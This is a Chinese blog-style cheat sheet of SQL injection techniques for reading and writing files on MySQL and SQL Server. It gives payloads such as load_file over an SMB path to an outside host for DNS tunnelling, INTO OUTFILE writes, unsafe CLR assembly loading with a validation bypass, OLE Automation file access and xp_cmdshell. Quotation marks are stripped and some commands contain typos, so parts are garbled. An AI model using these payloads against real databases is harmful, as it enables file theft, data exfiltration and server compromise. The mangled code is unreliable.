共计 1990 个字符，预计需要花费 5 分钟才能阅读完成。

这篇文章主要介绍了 SQL 注入中文件读写的方法有哪些，具有一定借鉴价值，感兴趣的朋友可以参考下，希望大家阅读完这篇文章之后大有收获，下面让丸趣 TV 小编带着大家一起了解一下。

一、MySQL

读文件

常见的读文件，可以用 16 进制代替字符串

select load_file(c:/boot.ini)
select load_file(0x633a2f626f6f742e696e69)
select load_file(//ecma.io/1.txt) # smb 协议
select load_file(\\\\ecma.io\\1.txt) #  可用于 DNS 隧道 

写文件

我暂时已知 l 两种写文件的方式

select 0x313233 into outfile  D:/1.txt

select 0x313233 into dumpfile  D:/1.txt

二、SQL Server

读文件

1. BULK INSERT

create table result(res varchar(8000));
bulk insert result from  d:/1.txt

2. CLR 集成

//  开启 CLR 集成
exec sp_configure  show advanced options 
reconfigure;
exec sp_configure  clr enabled ,1
reconfigure

create assembly sqb from  d:\1.exe  with permission_set=unsafe

上面一句可以利用 create assembly 函数从远程服务器加载任何.NET 二进制文件到数据库中; 但是他会验证是否为合法.NET 程序，导致失败，下面是读取方式

select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files

绕过，首先加载一个有效的.NET 的二进制文件，然后追加文件即可，下面是绕过方法。

create assembly sqb from  d:\net.exe 
alter assembly sqb add file from  d:\1.txt 
alter assembly sqb add file from  d:\notnet.exe

3. Script.FileSystemObject

#  开启 Ole Automation Procedures
 
sp_configure  show advanced options 
RECONFIGURE;
sp_configure  Ole Automation Procedures 
RECONFIGURE;

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate  scripting.filesystemobject ,@o out
exec sp_oamethod @o,  opentextfile , @f out,  d:\1.txt , 1
exec @ret = sp_onmethod @f,  readline , @line out
while(@ret = 0) begin print @line exec @ret = sp_oamethod @f,  readline , @line out end

写文件

1. Script.FileSystemObject

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate  scripting.filesystemobject ,@o out
exec sp_oamethod @o,  createtextfile , @f out,  e:\1.txt , 1
exec @ret = sp_oamethod @f,  writeline , NULL , This is the test string

2. BCP 复制文件（测试失败，无 bcp.exe）

c:\windows system32 bcp  select name from sysobjects  query testout.txt -c -s 127.0.0.1 -U sa -p sa

3. xp_cmdshell

exec xp_cmdshell  echo test d:\1.txt

三、Oracle

pass，Oracle 太坑了~~~ 几乎都受到 PL/SQL 的限制，暂时不讨论

感谢你能够认真阅读完这篇文章，希望丸趣 TV 小编分享的“SQL 注入中文件读写的方法有哪些”这篇文章对大家有帮助，同时也希望大家多多支持丸趣 TV，关注丸趣 TV 行业资讯频道，更多相关知识等着你来学习!